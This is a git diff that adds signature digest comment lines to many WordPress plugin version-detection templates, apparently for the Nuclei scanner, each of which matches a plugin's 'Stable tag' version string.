d7fb2209d1..e6ef340f3c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb829a58c4b240800a965ba89d1fd9dd700e077d6f1aaaaf6dcb7cb8b605f9fb02203148d4e98c3c5b06305ae7aaba00d296dea4be18a22d8fece91abd76ce76b5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..daed09b076 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058bee5e2a39b9a7a06d1eb99185cbbf588380c5a0fa4e4f19e7b7b3cc56aa9d1022100f2ad8c4294c7f046bd442af7976cc81d03d7cd9d4b2462d7c1e956113f9bf515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..de30014f98 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020fdb1a816729f1790884f8c7dc70f4ec128bc8328446398a976f8a8631b975002210096b3db22a773d9f958e32f97f97736733fc25c006005116dad819742a3b04cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..c9a407dd96 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016baa827c8c86fe0e07c5836b7ced1b4419c2dd593e8d92a30c5c8615e3eadbb02204f4df934313a8dbcce0175bf9c46b46c3754c34985a9ed375e94e072daf60819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..5bca035cc4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbd50598b976c1e80715adce0d8c0c09152fedcc71f6215308346148e21cf450022054f8651d619682fe476e4d8d5d70f30510d50182b1c45306052fabca3f90ab45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..8dd31e0725 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d429a2f88b3628453fa70668af1f7080d52bf498914d3994fa4fcf6c38f5714a022100b636c3c4358020363c6426561a39eaff57fc130d710aecdca763446859b337fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..5096a2b0f6 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb990d1363a6cd4974fca996f89c70def679cb436126f90a8a24886730e6374902206d048cfd33fd288063d54507f25c9cd067918c3fc8202ad4746c5de0306a5afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..bd2c1a0bf3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022048cf82a03085a7482f2e90bee5ab92d6c1e2f134608a91f729b2279f3d606ce402206df004c86b856d502044a553d0a255aaa37b62abd0c6465c23595de26b8c8a6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..4d757c7183 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b9454d0b3e055a855947dd55878bc98e62dc8b97eb02e9000357dc4a5e853b7022041c7dca599950d6347ffdf510fe458f071ec7f229327640584f226cbd521f113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..d340c8fbfb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100efd1f3cfd558b17c259498ab4fe4889f3a0401f89bc42c18468c00edb10a7613022100a6a1b5def844a389dbf832b34ab814c71daf75beb0dcc046d8f876ae29091a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..cae041142c 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206de5e201f368dfbc446d901528cc107b3a02028bf48b4e064d836ee14cce5860022100ee1d9e198faf67b1e5d0d7ec5d7df7941499b030f4a48e95b6a8d1cf48db0593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..90a523addc 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a6f2f3b61abddc27b68ef653ba127a624b1e0d0d4840c9c75b25d538368eced022030ee3bdc6255ea3f6665c120524263a85daa17f76c6229a1c777925bd204750e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..04e39289d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e91e48f076f51000802befc8baf1eb895b00439dc7c427c35b39b83baec16ae30220290a049459f81d804dde4ce142857170b9019ab062ef3312010d4154e41220ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..cc7528d044 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100810a272b20d1b35a8648647d418c065441c3daea5df91fd6c9e2f989995c9046022100a83437ca99e07ac06acd856fdfa9976701b17e33b8cf823b5d915836949be843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..6bfbe5b61a 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091ec6cf3bb2182eb9cda937ceb03493773eb310f5567abbd5f4435fbb9f86b5802205989061e105bb6d8280be2695a44645d27243a8afa9fb23457ea2576ba1b4fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..d27bf3ad80 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cedd440f2fb9bff525bfffd716a4213794238f1545df248ecba88f286973877202207d3cab92a2c910fe15ee63868a4f8c61bd1036ace02958cf2397f651f6bb3fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..c4f237a3cb 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220042222702854b6913d958045dbaee077f69dc44779f05e52baa92441f41f8f8d02207dcdff3a489a22299ebc866aec1304307f0d5d078830e3b5d5b9a7e7f6ec337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..fc47684f71 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8000dd6482dfa3fe8af25961758250076f6b1e9aaa4aaa83ac9d98d034aa2ac022077840480cfbcb127138cf750928adf9ea2cf58ed1dd4ce8b6736d84895ed3e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..ae68eef6e5 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f3136920d3c380f2a34988f6e8484f4e62bbcda4a55224956e23c7d6e598647022100c914dec03d37b5e320d15a36212b035318ba4d574b9275ea32d69a3ecc0211a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..8515fad8a5 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058fff78564219048d767e26647fb69729ec82f9e21b64e22666dc52862f96e1802205f18b063b9b53e1efe45deaf1c7a91a1faa765e19ad4bdf5ac44d11d823eae35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..08d5a302af 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7637b387ebfe00741523285f2ca4772c138a50654ed3d22c7e85d688a8b8fce022100e0c74fa824d3d9155f490db74990f78d0ad675666d27da511156f28653f08700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..e5cfaf92b1 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220209967a79afa1dca188bd12d701c269a1c488d2707c69959d05b8877d689ed95022001d7b3f351b147c4575f8023b3535ab2d67184ebba8deff2d728651f41caf3d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..b98a46f57f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009626ff10445d212929e964875a6e6f0106964f4014510ddb87a01aefb59747ac02203deb60d6213cd3d4a5c08dae51cdf8e213cc2e68a7e56d77a34c5b77dc9fd7d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..28e9fe4e75 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023ae4160236531a740a798a3bf9d64326329d59ab58e955995fdf3b0975ec805022100beba09d56524d709fa6bf3ac6b145b10ee2356c40334449c504ea57cabff1189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..e2ab46af6c 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033c5718174b439a4bd243bdae28b8706d1e9bfa9f68d25d78a8c654caa76eda3022100a776347d1c7840a0b4db220c5115d23294497dd92c353e91b04ed7b47f64dfe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..40eeac52ff 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c48d69e47142e2e14fbab7d0096e2f7bb6d1c7884d484c937080b8d61da1ca350221009a465a0878cfb86334e00ca00bef0960500d5ec0271e4422ecb5bed495c3aa2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..9ae14ceaf7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204655e54017ba0a8ba5c9e32cc959375e378c27a7f49f7c733c8e988388b94dfa022017ec07ab051be7f3b2ec5217ceb11f6bc93ce301c6cf89f4c6d2d46b77f16c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..6c8debc9d9 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022057866fde8c0b2e252c60edf061522096df0d34dc8b9afe9fd6cc22bf1c242af4022100a03520d12638a94fc2b97ce97a59cc5c055adf30bdd954ace1d9db127bb4cfc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..365417d127 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2f51335612594a454371e6962b47ac0b5dfc6cbcd24257f8f21ad9539672868022100da5a60c9f4729752a1404daf9f14c001885ada34c2eeb86af2cc76e835f7f844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..23c1bc74ad 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d6297f49c6bfc0a6bb7c13719b6cbc2995aaa469a0d303dfd57a708d1fcdb010221009171b60d971d26a7eee876e5d67c3f469cc10782ee5c187f33a6a759f1ae292d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..5301b31f5e 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008699c9d6da156926de398b87878208fcb6893ca91b796daac19a663a5f817da302201118d1f2ee3efc510ba784d66dede3f7afa28a70498771daf4859287a91f7811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..82a350e946 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053d2dde042e76f15509bdf81529d40e72b95b2000f8968630dc62448a2fd2b88022031ebba7eb0c6ae6b16a2446e318a1c4144b930fae879ce3ee7a5ba24d68c6faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..bde37707cc 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a8fbe8e00ec0d436215ef667f353aaac5cba57fc752e5e8841167ea1b5a357b022007750042a2dcff9750301ab8dc656b08291f3fc16f11d873e309f79e5fac4ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..3bef3a6101 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010c3b1d582264fa747a12b19764130e93a4b3d0eac288ef1eb1d5905a734d551022033361a5545bbe46d09c2eb6336c5a836bfe6bb87f05e00e54e6c3183cbd55132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..fae4d1847e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f1f669743e9a1e534e96a8f7b31f4957c988b48281cd28db38fa122278a9fb7022100e495be0ed03ef2d2cb1c7032ac8d79cad91af5a90f012ff426087dcd1727b929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..eb54547740 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100906dbd628506eb186fc9879d58315791b617425775b672aec3bf2bc06f6db10f022100b0018a7a7559d95da62a837c698969d0066e9259eb83c034d50f2a31a207844e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..699876482e 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024159f070c304e1f63b78aad626575a9a09c67f075ddf9914fddff6b9817e9c8022005fb3b1773b7619389f8d968dc10dce354dd8d85cbfc8423b6e11e41b9b0435b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..b67065cd23 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3e683bbd64eccf833013cfc63b6b07536a7227d48fd15687c6c9d451afa6cec022020a09bf76a6c12aa5f3ab34cf77ee704005d7387dc64c092a013aac6346e9c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..0149891db5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f33c4c262f162d1ce5d6b7e4b8d27c82f940ad82725839415bcbfe5a569a3b6022100f9c6bb62101c0cc624379a49d89c077b04a05907882dab317697abad1c43e2f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..8eb01b7210 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f6cd89961dd70af2b83e2953c06f798c052b3898dd7561469df4d066969f21602210083cce36a6b3cc0d2a6f1d8197c8ae65597703de58d2d278810de5da46f37493f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..123d10e5bc 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200171ce418fef10f3f2be22931cf1777f9344d221dd9fd5be1f5680e6f283e5d60220368de6e367adfe0265c6d4e3792d4623a85fae42135d6e98ce27aab3e97c1e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..dcf015bd3c 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0877ff740797846620a57bc57021cc65d907dd1cfb8e0062a664fcb28345e2302207753bd9b913bfaf6ae1cd693829d95451d8e49b449f4f7f98a0a8df51fa77642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..e0f0473006 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220764badbca9d36bacf01f641afee9a1f55b1f5b4430293961cc457d0a32854a4b022100999d3458f82c524a39360b004d6fef963321288ecf756ffcf2092dc5628d5871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..5761fe1eb9 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030df33adcafbdcd63d8962ac4f30f178c70f5ad3c8fd9ca0f7a3148d07d4f9e4022032c4c8f05ef9b4dc377488e9217ef49c7a8392a0fc4cdae160c637d139b60e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..4b4e65de0e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066bb9ba7ef0f6db996e7fde53b80231f2016255365d198c1e98ab51b79b985100220269779b58a5a69438e62b0a1dc1d051edf24f8a80006457f8242bb6ecd81676e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..6969b62a20 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200176d2f524122ea58cec79594feaf2f39d48cef681c23334205215357ab93c4a022100ecc1b679832dc87e32e048c91f8fc51fb31de85ccf752f815b74921acdde692a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..3b4eb944f5 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da2a9b78b47324e4bf8da4ab9b03a5662bcb7797c201604f735258da2c34dcba022025aa7f427eb6820f79586a6cdce2d55092a2980292313a849620c4e01cfec90c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..34ecfa1292 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 